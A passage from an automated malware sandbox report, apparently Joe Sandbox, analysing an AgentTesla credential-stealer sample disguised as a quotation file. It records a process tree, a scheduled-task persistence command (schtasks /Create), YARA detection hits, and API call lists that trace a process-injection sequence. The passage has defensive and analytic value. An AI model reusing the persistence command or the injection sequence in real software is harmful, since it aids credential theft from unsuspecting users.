                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.1961223046.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.1961223046.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.1958682977.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.1958682977.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.1961223046.000000000326C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Has exited:true

                                      Target ID:25
                                      Start time:07:10:24
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                      Imagebase:0x7ff70f330000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:26
                                      Start time:07:10:25
                                      Start date:27/09/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp6606.tmp"
                                      Imagebase:0x6f0000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:27
                                      Start time:07:10:25
                                      Start date:27/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:28
                                      Start time:07:10:25
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                      Imagebase:0xfe0000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.4163218058.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.4163218058.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.4163218058.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Has exited:false


                                        Execution Graph

                                        Execution Coverage:10.5%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:2.1%
                                        Total number of Nodes:143
                                        Total number of Limit Nodes:13

                                        Control-flow Graph

                                        control_flow_graph 594 8ad7f0-8ad88f GetCurrentProcess 599 8ad898-8ad8cc GetCurrentThread 594->599 600 8ad891-8ad897 594->600 601 8ad8ce-8ad8d4 599->601 602 8ad8d5-8ad909 GetCurrentProcess 599->602 600->599 601->602 604 8ad90b-8ad911 602->604 605 8ad912-8ad92d call 8ad9cf 602->605 604->605 608 8ad933-8ad962 GetCurrentThreadId 605->608 609 8ad96b-8ad9cd 608->609 610 8ad964-8ad96a 608->610 610->609
                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 008AD87E
                                        • GetCurrentThread.KERNEL32 ref: 008AD8BB
                                        • GetCurrentProcess.KERNEL32 ref: 008AD8F8
                                        • GetCurrentThreadId.KERNEL32 ref: 008AD951
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730545540.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8a0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: 4fc80b6975ac72c84942bde01a44396e1e93d2d39dcc9e551c9a00255012b0e0
                                        • Instruction ID: 5f88ee312754a19badcecba9f246adebb63faca4c50b3a5378f1d8bd5778bdd9
                                        • Opcode Fuzzy Hash: 4fc80b6975ac72c84942bde01a44396e1e93d2d39dcc9e551c9a00255012b0e0
                                        • Instruction Fuzzy Hash: E25185B09017498FDB14CFA9C948BDEBBF0FB49314F208469E059A72A1DB749984CF66

                                        Control-flow Graph

                                        control_flow_graph 617 8ad800-8ad88f GetCurrentProcess 621 8ad898-8ad8cc GetCurrentThread 617->621 622 8ad891-8ad897 617->622 623 8ad8ce-8ad8d4 621->623 624 8ad8d5-8ad909 GetCurrentProcess 621->624 622->621 623->624 626 8ad90b-8ad911 624->626 627 8ad912-8ad92d call 8ad9cf 624->627 626->627 630 8ad933-8ad962 GetCurrentThreadId 627->630 631 8ad96b-8ad9cd 630->631 632 8ad964-8ad96a 630->632 632->631
                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 008AD87E
                                        • GetCurrentThread.KERNEL32 ref: 008AD8BB
                                        • GetCurrentProcess.KERNEL32 ref: 008AD8F8
                                        • GetCurrentThreadId.KERNEL32 ref: 008AD951
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730545540.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8a0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: 92852fa0c3bfa4c5261585ca047c7bb89a7cc4e7f661e416c781b6468b3ec7c7
                                        • Instruction ID: 515e9d5143f75b36d2a0a214ef53ee7090c245c37bc8709b968dde612e91cb9b
                                        • Opcode Fuzzy Hash: 92852fa0c3bfa4c5261585ca047c7bb89a7cc4e7f661e416c781b6468b3ec7c7
                                        • Instruction Fuzzy Hash: D55165B09017098FDB14DFA9C948BDEBBF1FB48304F20C429E059A7660DB749984CF66

                                        Control-flow Graph

                                        control_flow_graph 809 6cc15e5-6cc1685 811 6cc16be-6cc16de 809->811 812 6cc1687-6cc1691 809->812 817 6cc1717-6cc1746 811->817 818 6cc16e0-6cc16ea 811->818 812->811 813 6cc1693-6cc1695 812->813 815 6cc16b8-6cc16bb 813->815 816 6cc1697-6cc16a1 813->816 815->811 819 6cc16a5-6cc16b4 816->819 820 6cc16a3 816->820 826 6cc177f-6cc1839 CreateProcessA 817->826 827 6cc1748-6cc1752 817->827 818->817 822 6cc16ec-6cc16ee 818->822 819->819 821 6cc16b6 819->821 820->819 821->815 823 6cc16f0-6cc16fa 822->823 824 6cc1711-6cc1714 822->824 828 6cc16fc 823->828 829 6cc16fe-6cc170d 823->829 824->817 840 6cc183b-6cc1841 826->840 841 6cc1842-6cc18c8 826->841 827->826 830 6cc1754-6cc1756 827->830 828->829 829->829 831 6cc170f 829->831 832 6cc1758-6cc1762 830->832 833 6cc1779-6cc177c 830->833 831->824 835 6cc1764 832->835 836 6cc1766-6cc1775 832->836 833->826 835->836 836->836 837 6cc1777 836->837 837->833 840->841 851 6cc18d8-6cc18dc 841->851 852 6cc18ca-6cc18ce 841->852 854 6cc18ec-6cc18f0 851->854 855 6cc18de-6cc18e2 851->855 852->851 853 6cc18d0 852->853 853->851 857 6cc1900-6cc1904 854->857 858 6cc18f2-6cc18f6 854->858 855->854 856 6cc18e4 855->856 856->854 860 6cc1916-6cc191d 857->860 861 6cc1906-6cc190c 857->861 858->857 859 6cc18f8 858->859 859->857 862 6cc191f-6cc192e 860->862 863 6cc1934 860->863 861->860 862->863 865 6cc1935 863->865 865->865
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06CC1826
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 72920688e529508a4dae90120535602ee94f3f949df143e71dceda5ada3c22fc
                                        • Instruction ID: 452aaff8ec0239b090ab0bd7c97a9ec3607f476c7f9f24fec2c5d8234da74141
                                        • Opcode Fuzzy Hash: 72920688e529508a4dae90120535602ee94f3f949df143e71dceda5ada3c22fc
                                        • Instruction Fuzzy Hash: E8A17B70D00619CFEB50CF69C841BDDBBB2EF44320F1885AAE848A7641DB749A85CF91

                                        Control-flow Graph

                                        control_flow_graph 866 6cc15f0-6cc1685 868 6cc16be-6cc16de 866->868 869 6cc1687-6cc1691 866->869 874 6cc1717-6cc1746 868->874 875 6cc16e0-6cc16ea 868->875 869->868 870 6cc1693-6cc1695 869->870 872 6cc16b8-6cc16bb 870->872 873 6cc1697-6cc16a1 870->873 872->868 876 6cc16a5-6cc16b4 873->876 877 6cc16a3 873->877 883 6cc177f-6cc1839 CreateProcessA 874->883 884 6cc1748-6cc1752 874->884 875->874 879 6cc16ec-6cc16ee 875->879 876->876 878 6cc16b6 876->878 877->876 878->872 880 6cc16f0-6cc16fa 879->880 881 6cc1711-6cc1714 879->881 885 6cc16fc 880->885 886 6cc16fe-6cc170d 880->886 881->874 897 6cc183b-6cc1841 883->897 898 6cc1842-6cc18c8 883->898 884->883 887 6cc1754-6cc1756 884->887 885->886 886->886 888 6cc170f 886->888 889 6cc1758-6cc1762 887->889 890 6cc1779-6cc177c 887->890 888->881 892 6cc1764 889->892 893 6cc1766-6cc1775 889->893 890->883 892->893 893->893 894 6cc1777 893->894 894->890 897->898 908 6cc18d8-6cc18dc 898->908 909 6cc18ca-6cc18ce 898->909 911 6cc18ec-6cc18f0 908->911 912 6cc18de-6cc18e2 908->912 909->908 910 6cc18d0 909->910 910->908 914 6cc1900-6cc1904 911->914 915 6cc18f2-6cc18f6 911->915 912->911 913 6cc18e4 912->913 913->911 917 6cc1916-6cc191d 914->917 918 6cc1906-6cc190c 914->918 915->914 916 6cc18f8 915->916 916->914 919 6cc191f-6cc192e 917->919 920 6cc1934 917->920 918->917 919->920 922 6cc1935 920->922 922->922
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06CC1826
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0

                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 008AB3BE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730545540.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8a0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0

                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 008A5F31
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730545540.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8a0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0

                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 008A5F31
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730545540.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8a0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0

                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06CC13F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06CC13F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06CC14D8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CC09DE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 008ADACF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730545540.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8a0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06CC14D8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CC09DE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 008ADACF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730545540.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8a0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06CC5C95
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06CC1316
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06CC1316
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06CC5C95
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 008AB3BE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730545540.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8a0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06CC5C95
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730229397.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_84d000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730340384.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_85d000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730340384.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_85d000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e7f6534e17e5a32c2e21340d8c06f739429e1bee78224e79ee57845977e2ea11
                                        • Instruction ID: 23dc1b2c55645c75081f3aa42f84b0902eb39ba4aa541ec396c116fdf63406ba
                                        • Opcode Fuzzy Hash: e7f6534e17e5a32c2e21340d8c06f739429e1bee78224e79ee57845977e2ea11
                                        • Instruction Fuzzy Hash: D1219F755097808FDB12CF24D994B15BF71FB46314F28C5EADC498B6A7C33A980ACB62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730229397.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_84d000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                        • Instruction ID: 1a703aebb10326f5e4c17d147f6f123a9fbfddae4647cf8d14704afdb7d0a785
                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                        • Instruction Fuzzy Hash: 7C11E176404344CFCB02CF10D5C4B16BF71FB94324F24C2A9D8094B256C33AE85ACBA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730229397.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_84d000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: adc614c1e49f341afb60f785684f8267aa15145951e5e94ca9b7adbaad5da487
                                        • Instruction ID: 5dc923d8d42643478d5ce98919d5301f21ecc98a45749aa0ac0dad763cea97d1
                                        • Opcode Fuzzy Hash: adc614c1e49f341afb60f785684f8267aa15145951e5e94ca9b7adbaad5da487
                                        • Instruction Fuzzy Hash: 5601A7711093489AE7114B25CDC4767FFD8FF81364F28C56AED098A296C6799C40C671
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730229397.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_84d000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8252da2f484a76daae48a7160d9001b9d71a9f119f2f9bf1e6eb40b0f01d19b4
                                        • Instruction ID: e7afa15f00061d39754607dba208703644beb2906aac868264a6eaf1a1a6f3af
                                        • Opcode Fuzzy Hash: 8252da2f484a76daae48a7160d9001b9d71a9f119f2f9bf1e6eb40b0f01d19b4
                                        • Instruction Fuzzy Hash: 13F062724043449AE7118B16DDC4B66FFE8EB91734F18C55AED484E296C2799C44CA71
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e7b39122f97403eedc98123dfda390bf13fbe2c0f5a4d2605e49c58640ed9a17
                                        • Instruction ID: e787b64193bbb0e5b89ae1fd9a4a9119c69afa6d05c2561e23a97fdc35d0339c
                                        • Opcode Fuzzy Hash: e7b39122f97403eedc98123dfda390bf13fbe2c0f5a4d2605e49c58640ed9a17
                                        • Instruction Fuzzy Hash: 52E11A74E002598FCB14DFA9D5809AEFBB2FF89314F248159E814AB35AD731AD81CF60
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 58b434000911a2a0bb99cf2159aa510f8dfc1cf00476fc758d39708fd45b96d8
                                        • Instruction ID: a9e67644f3fce0f5d8ad6f677de3efb3532ceca9410481a94823b447801920a3
                                        • Opcode Fuzzy Hash: 58b434000911a2a0bb99cf2159aa510f8dfc1cf00476fc758d39708fd45b96d8
                                        • Instruction Fuzzy Hash: 3FE10974E00219CFCB14DFA9D5809AEFBB2BF88314F249159D814AB35AD731AD81CFA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1735067470.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4bb0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3f88f7ab9f27395ea0a4b4faf4f0a7278f5af05275949997b613184a1b9ef8d6
                                        • Instruction ID: 38b6c94ac40fe68b8a2e263af79eca036fab5ec42a2de312ac09c30bd41d742b
                                        • Opcode Fuzzy Hash: 3f88f7ab9f27395ea0a4b4faf4f0a7278f5af05275949997b613184a1b9ef8d6
                                        • Instruction Fuzzy Hash: 5BE1FA74E002198FCB14DFA9D5809AEFBB2FF89304F249199D855AB35AD770AD41CFA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1735067470.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4bb0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 798a61e16659e3e815a92e954a7411cd1fac452643e9aeda161d00a210b8dc65
                                        • Instruction ID: 3af29ebb1d517dd859e977d0ad98ae19b5e423ca3d03d3d071d747c34681577e
                                        • Opcode Fuzzy Hash: 798a61e16659e3e815a92e954a7411cd1fac452643e9aeda161d00a210b8dc65
                                        • Instruction Fuzzy Hash: B2E10A74E002198FDB14DFA9D5809EEBBB2FF89304F2491A9D854AB359D770AD41CFA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1735067470.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4bb0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4b892bc6c252af4bfc989fdc9f770d906c3235f510a16c14e08e966b4db9a762
                                        • Instruction ID: d3a1ecb044742c67b7ffa94c5b23c1fa982b3bf533f9746fba43b96eef4326e7
                                        • Opcode Fuzzy Hash: 4b892bc6c252af4bfc989fdc9f770d906c3235f510a16c14e08e966b4db9a762
                                        • Instruction Fuzzy Hash: 08E11A74E002198FCB14DFA9D5809AEFBB2FF88304F249199E854AB359D770AD41CFA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1735067470.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4bb0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 673135ac64682a1e450b86a4a7e79a1745d771f3938fb6b8429b985cfbc0b688
                                        • Instruction ID: 79bb983add7340559d54e736ce45da5eccabd7dc2a265bc56b4a5ca790f7cfe0
                                        • Opcode Fuzzy Hash: 673135ac64682a1e450b86a4a7e79a1745d771f3938fb6b8429b985cfbc0b688
                                        • Instruction Fuzzy Hash: EBE11731D10A1ACADB10EB64D954A9DF7B1FF95300F108B9AE5093B225FB70AAC5CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730545540.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
